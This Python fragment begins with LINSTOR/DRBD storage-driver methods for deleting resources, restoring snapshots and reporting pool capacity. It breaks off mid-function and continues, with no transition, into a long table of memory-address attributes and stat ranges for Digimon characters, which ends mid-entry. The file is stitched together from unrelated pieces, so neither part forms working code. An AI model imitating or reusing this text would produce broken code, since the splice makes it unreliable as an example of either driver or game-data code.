def _api_rsc_delete(self, rsc_name, node_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
rsc_reply = lin.resource_delete(node_name=node_name,
rsc_name=rsc_name)
return rsc_reply
def _api_volume_dfn_delete(self, rsc_name, volume_nr):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
rsc_reply = lin.volume_dfn_delete(rsc_name=rsc_name,
volume_nr=volume_nr)
return rsc_reply
def _api_snapshot_volume_dfn_restore(self,
src_rsc_name,
src_snap_name,
new_vol_name):
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
vol_reply = lin.snapshot_volume_definition_restore(
from_resource=src_rsc_name,
from_snapshot=src_snap_name,
to_resource=new_vol_name)
return vol_reply
def _api_snapshot_resource_restore(self,
src_rsc_name,
src_snap_name,
new_vol_name):
lin = linstor.Resource(src_rsc_name, uri=self.default_uri)
new_rsc = lin.restore_from_snapshot(src_snap_name, new_vol_name)
# Adds an aux/property KV for synchronous return from snapshot restore
with lin_drv(self.default_uri) as lin:
if not lin.connected:
lin.connect()
aux_prop = {}
aux_prop["Aux/restore"] = "done"
lin.volume_dfn_modify(
rsc_name=new_vol_name,
volume_nr=0,
set_properties=aux_prop)
if new_rsc.name == new_vol_name:
return True
return False
def _get_rsc_path(self, rsc_name):
rsc_list_reply = self._get_api_resource_list()
for rsc in rsc_list_reply:
if rsc["name"] == rsc_name and rsc["node_name"] == self.host_name:
for volume in rsc["volumes"]:
if volume["volume_number"] == 0:
return volume["device_path"]
def _get_local_path(self, volume):
try:
full_rsc_name = (
self._drbd_resource_name_from_cinder_volume(volume))
return self._get_rsc_path(full_rsc_name)
except Exception:
message = _('Local Volume not found.')
raise exception.VolumeBackendAPIException(data=message)
def _get_spd(self):
# Storage Pool Definition List
spd_list_reply = self._get_api_storage_pool_dfn_list()
spd_list = []
for spd in spd_list_reply:
spd_list.append(spd["storage_pool_name"])
return spd_list
def _get_storage_pool(self):
# Fetch Storage Pool List
sp_list_reply = self._get_api_storage_pool_list()
# Separate the diskless nodes
sp_diskless_list = []
sp_list = []
node_count = 0
if sp_list_reply:
for node in sp_list_reply:
if node["storage_pool_name"] == self.default_pool:
sp_node = {}
sp_node["node_name"] = node["node_name"]
sp_node["sp_uuid"] = node["uuid"]
sp_node["sp_name"] = node["storage_pool_name"]
if node["provider_kind"] == DISKLESS:
diskless = True
sp_node["sp_free"] = -1.0
sp_node["sp_cap"] = -1.0
sp_node["sp_allocated"] = 0.0
else:
diskless = False
if "free_capacity" in node:
sp_node["sp_free"] = round(
int(node["free_capacity"]) /
units.Mi,
2)
sp_node["sp_cap"] = round(
int(node["total_capacity"]) /
units.Mi,
2)
drivers = [LVM, LVM_THIN, ZFS, ZFS_THIN, DISKLESS]
# Driver selection
if node["provider_kind"] in drivers:
sp_node['driver_name'] = node["provider_kind"]
else:
sp_node['driver_name'] = str(node["provider_kind"])
if diskless:
sp_diskless_list.append(sp_node)
else:
sp_list.append(sp_node)
node_count += 1
# Add the diskless nodes to the end of the list
if sp_diskless_list:
sp_list.extend(sp_diskless_list)
return sp_list
def _get_volume_stats(self):
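# Build the backend stats report: pool name, capacities and provisioned size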
data = {}
data["volume_backend_name"] = self.default_backend_name
data["vendor_name"] = "LINBIT"
data["driver_version"] = self.VERSION
data["pools"] = []
sp_data = self._get_storage_pool()
rd_list = self._get_resource_definitions()
# Total volumes and capacity
num_vols = len(rd_list)
# allocated_sizes_gb = []
free_gb = []
total_gb = []
thin_enabled = False
# Total & Free capacity for Local Node
single_pool = {}
for sp in sp_data:
if "Diskless" not in sp["driver_name"]:
thin_backends = [LVM_THIN, ZFS_THIN]
if sp["driver_name"] in thin_backends:
thin_enabled = True
if "sp_cap" in sp:
if sp["sp_cap"] >= 0.0:
total_gb.append(sp["sp_cap"])
if "sp_free" in sp:
if sp["sp_free"] >= 0.0:
free_gb.append(sp["sp_free"])
# Allocated capacity
sp_allocated_size_gb = 0.0
local_resources = []
reply = self._get_api_resource_list()
if reply:
for rsc in reply:
if rsc["node_name"] == self.host_name:
local_resources.append(rsc["name"])
for rsc_name in local_resources:
rsc = linstor.Resource(str(rsc_name))
if not rsc.is_diskless(self.host_name):
sp_allocated_size_gb += round(
int(rsc.volumes[0].size) / units.Gi, 2)
single_pool["pool_name"] = data["volume_backend_name"]
single_pool["free_capacity_gb"] = min(free_gb) if free_gb else 0
single_pool["total_capacity_gb"] = min(total_gb) if total_gb else 0
single_pool["provisioned_capacity_gb"] = sp_allocated_size_gb
#Muchomon 030
Attribute(
name="Muchomon Element",
addresses=[0x02665CE2],
number_of_bytes=1,
min_value=Get_Element_Type(0, 0, 30),
max_value=Get_Element_Type(0, 0, 30),
is_little_endian=True, ),
Attribute(
name="Muchomon +DP",
addresses=[0x02665CE4],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Muchomon HP",
addresses=[0x02665CE6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(600,fire_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(600,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Muchomon Circle",
addresses=[0x02665CE8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(320,fire_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(320,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Muchomon Triangle",
addresses=[0x02665d04],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(220,fire_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(220,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Muchomon Cross",
addresses=[0x02665d20],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,fire_special_modifier,rookie_modifier,7),
max_value=Max_Cross_Multiplier(0,fire_special_modifier,rookie_modifier,7),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Muchomon Cross Effect",
addresses=[0x02665dac],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Candlemon 031
Attribute(
name="Candlemon Element",
addresses=[0x02665E1e],
number_of_bytes=1,
min_value=Get_Element_Type(0, 0, 31),
max_value=Get_Element_Type(0, 0, 31),
is_little_endian=True, ),
Attribute(
name="Candlemon +DP",
addresses=[0x02665E20],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Candlemon HP",
addresses=[0x02665E22],
number_of_bytes=2,
min_value=Min_HP_Multiplier(480,fire_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(480,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Candlemon Circle",
addresses=[0x02665E24],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(380,fire_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(380,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Candlemon Triangle",
addresses=[0x02665e40],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(270,fire_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(270,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Candlemon Cross",
addresses=[0x02665e5c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,fire_special_modifier,rookie_modifier,5),
max_value=Max_Cross_Multiplier(0,fire_special_modifier,rookie_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Candlemon Cross Effect",
addresses=[0x02665ee8],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#D-Otamamon 032
Attribute(
name="D-Otamamon Element",
addresses=[0x02665F5A],
number_of_bytes=1,
min_value=Get_Element_Type(0, 0, 32),
max_value=Get_Element_Type(0, 0, 32),
is_little_endian=True, ),
Attribute(
name="D-Otamamon +DP",
addresses=[0x02665F5C],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="D-Otamamon HP",
addresses=[0x02665F5E],
number_of_bytes=2,
min_value=Min_HP_Multiplier(550,fire_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(550,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="D-Otamamon Circle",
addresses=[0x02665f60],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(300,fire_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(300,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="D-Otamamon Triangle",
addresses=[0x02665f7c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,fire_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(200,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="D-Otamamon Cross",
addresses=[0x02665f98],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,fire_special_modifier,rookie_modifier,12),
max_value=Max_Cross_Multiplier(150,fire_special_modifier,rookie_modifier,12),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="D-Otamamon Cross Effect",
addresses=[0x2666154],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Goburimon 033
Attribute(
name="Goburimon Element",
addresses=[0x026661c6],
number_of_bytes=1,
min_value=Get_Element_Type(0, 0, 33),
max_value=Get_Element_Type(0, 0, 33),
is_little_endian=True, ),
Attribute(
name="Goburimon +DP",
addresses=[0x026661c8],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Goburimon HP",
addresses=[0x026661CA],
number_of_bytes=2,
min_value=Min_HP_Multiplier(500,fire_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(500,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Goburimon Circle",
addresses=[0x026661CC],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(300,fire_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(300,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Goburimon Triangle",
addresses=[0x026661e8],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(300,fire_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(300,fire_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Goburimon Cross",
addresses=[0x02666204],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(300,fire_special_modifier,rookie_modifier,0),
max_value=Max_Cross_Multiplier(300,fire_special_modifier,rookie_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Goburimon Cross Effect",
addresses=[0x02666290],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Vikemon 034
Attribute(
name="Vikemon Element",
addresses=[0x2666302],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 34),
max_value=Get_Element_Type(16, 3, 34),
is_little_endian=True, ),
Attribute(
name="Vikemon +DP",
addresses=[0x2666304],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Vikemon HP",
addresses=[0x2666306],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2420,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2420,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vikemon Circle",
addresses=[0x2666308],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(760,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(760,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vikemon Triangle",
addresses=[0x2666324],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(570,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(570,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vikemon Cross",
addresses=[0x2666340],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(390,ice_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(390,ice_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vikemon Cross Effect",
addresses=[0x26663cc],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Omnimon II 035
Attribute(
name="Omnimon II Element",
addresses=[0x266643e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 35),
max_value=Get_Element_Type(16, 3, 35),
is_little_endian=True, ),
Attribute(
name="Omnimon II +DP",
addresses=[0x2666440],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Omnimon II HP",
addresses=[0x2666442],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2420,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2420,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Omnimon II Circle",
addresses=[0x2666444],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(550,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(550,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Omnimon II Triangle",
addresses=[0x2666460],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(800,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(800,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Omnimon II Cross",
addresses=[0x266647c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,7),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,7),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Omnimon II Cross Effect",
addresses=[0x2666508],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MetalSeadramon 036
Attribute(
name="MetalSeadramon Element",
addresses=[0x266657a],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 36),
max_value=Get_Element_Type(16, 3, 36),
is_little_endian=True, ),
Attribute(
name="MetalSeadramon +DP",
addresses=[0x266657c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MetalSeadramon HP",
addresses=[0x266657e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2030,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2030,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalSeadramon Circle",
addresses=[0x2666580],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalSeadramon Triangle",
addresses=[0x266659c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(450,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(450,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalSeadramon Cross",
addresses=[0x26665b8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(400,ice_special_modifier,ultimate_modifier,11),
max_value=Max_Cross_Multiplier(400,ice_special_modifier,ultimate_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalSeadramon Cross Effect",
addresses=[0x2666644],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MetalGarurumon 037
Attribute(
name="MetalGarurumon Element",
addresses=[0x26666b6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 37),
max_value=Get_Element_Type(16, 3, 37),
is_little_endian=True, ),
Attribute(
name="MetalGarurumon +DP",
addresses=[0x26666b8],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MetalGarurumon HP",
addresses=[0x26666ba],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2250,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2250,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalGarurumon Circle",
addresses=[0x26666bc],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalGarurumon Triangle",
addresses=[0x26666d8],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(450,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(450,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalGarurumon Cross",
addresses=[0x26666f4],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(400,ice_special_modifier,ultimate_modifier,11),
max_value=Max_Cross_Multiplier(400,ice_special_modifier,ultimate_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalGarurumon Cross Effect",
addresses=[0x2666780],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MarineAngemon 038
Attribute(
name="MarineAngemon Element",
addresses=[0x26667f2],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 38),
max_value=Get_Element_Type(16, 3, 38),
is_little_endian=True, ),
Attribute(
name="MarineAngemon +DP",
addresses=[0x26667f4],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MarineAngemon HP",
addresses=[0x26667f6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1540,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1540,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MarineAngemon Circle",
addresses=[0x26667f8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(630,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(630,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MarineAngemon Triangle",
addresses=[0x2666814],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(480,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(480,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MarineAngemon Cross",
addresses=[0x2666830],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(220,ice_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(220,ice_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MarineAngemon Cross Effect",
addresses=[0x26668bc],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#WereGarurumon 039
Attribute(
name="WereGarurumon Element",
addresses=[0x2666a5e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 39),
max_value=Get_Element_Type(16, 3, 39),
is_little_endian=True, ),
Attribute(
name="WereGarurumon +DP",
addresses=[0x2666a60],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="WereGarurumon HP",
addresses=[0x2666a62],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1820,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1820,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WereGarurumon Circle",
addresses=[0x2666a64],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(670,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(670,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WereGarurumon Triangle",
addresses=[0x2666a80],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(500,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(500,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WereGarurumon Cross",
addresses=[0x2666a9c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,6),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,6),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WereGarurumon Cross Effect",
addresses=[0x2666b28],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Zudomon 040
Attribute(
name="Zudomon Element",
addresses=[0x2666b9a],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 40),
max_value=Get_Element_Type(16, 3, 40),
is_little_endian=True, ),
Attribute(
name="Zudomon +DP",
addresses=[0x2666b9c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Zudomon HP",
addresses=[0x2666b9e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2090,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2090,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Zudomon Circle",
addresses=[0x2666ba0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Zudomon Triangle",
addresses=[0x2666bbc],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(300,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(300,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Zudomon Cross",
addresses=[0x2666bd8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(250,ice_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(250,ice_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Zudomon Cross Effect",
addresses=[0x2666c64],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Panjyamon 041
Attribute(
name="Panjyamon Element",
addresses=[0x2666cd6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 41),
max_value=Get_Element_Type(16, 3, 41),
is_little_endian=True, ),
Attribute(
name="Panjyamon +DP",
addresses=[0x2666cd8],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Panjyamon HP",
addresses=[0x2666cda],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1800,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1800,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Panjyamon Circle",
addresses=[0x2666cdc],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(620,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(620,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Panjyamon Triangle",
addresses=[0x2666cf8],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(390,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(390,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Panjyamon Cross",
addresses=[0x2666d14],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,6),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,6),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Panjyamon Cross Effect",
addresses=[0x2666da0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MegaSeadramon 042
Attribute(
name="MegaSeadramon Element",
addresses=[0x2666e12],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 42),
max_value=Get_Element_Type(16, 3, 42),
is_little_endian=True, ),
Attribute(
name="MegaSeadramon +DP",
addresses=[0x2666e14],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MegaSeadramon HP",
addresses=[0x2666e16],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1870,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1870,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaSeadramon Circle",
addresses=[0x2666e18],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(650,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(650,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaSeadramon Triangle",
addresses=[0x2666e34],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(360,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(360,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaSeadramon Cross",
addresses=[0x2666e50],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,5),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaSeadramon Cross Effect",
addresses=[0x2666edc],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#WaruSeadramon 043
Attribute(
name="WaruSeadramon Element",
addresses=[0x2666f4e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 43),
max_value=Get_Element_Type(16, 3, 43),
is_little_endian=True, ),
Attribute(
name="WaruSeadramon +DP",
addresses=[0x2666f50],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="WaruSeadramon HP",
addresses=[0x2666f52],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1760,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1760,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WaruSeadramon Circle",
addresses=[0x2666f54],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(650,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(650,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WaruSeadramon Triangle",
addresses=[0x2666f70],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(360,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(360,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WaruSeadramon Cross",
addresses=[0x2666f8c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,ice_special_modifier,ultimate_modifier,10),
max_value=Max_Cross_Multiplier(200,ice_special_modifier,ultimate_modifier,10),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WaruSeadramon Cross Effect",
addresses=[0x2667018],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Brachiomon 044
Attribute(
name="Brachiomon Element",
addresses=[0x266708a],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 44),
max_value=Get_Element_Type(16, 3, 44),
is_little_endian=True, ),
Attribute(
name="Brachiomon +DP",
addresses=[0x266708c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Brachiomon HP",
addresses=[0x266708e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2300,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2300,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Brachiomon Circle",
addresses=[0x2667090],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(600,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(600,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Brachiomon Triangle",
addresses=[0x26670ac],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(380,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(380,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Brachiomon Cross",
addresses=[0x26670c8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,ice_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(150,ice_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Brachiomon Cross Effect",
addresses=[0x2667154],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#BlueMeramon 045
Attribute(
name="BlueMeramon Element",
addresses=[0x26671c6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 45),
max_value=Get_Element_Type(16, 3, 45),
is_little_endian=True, ),
Attribute(
name="BlueMeramon +DP",
addresses=[0x26671c8],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="BlueMeramon HP",
addresses=[0x26671ca],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1430,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1430,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="BlueMeramon Circle",
addresses=[0x26671cc],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
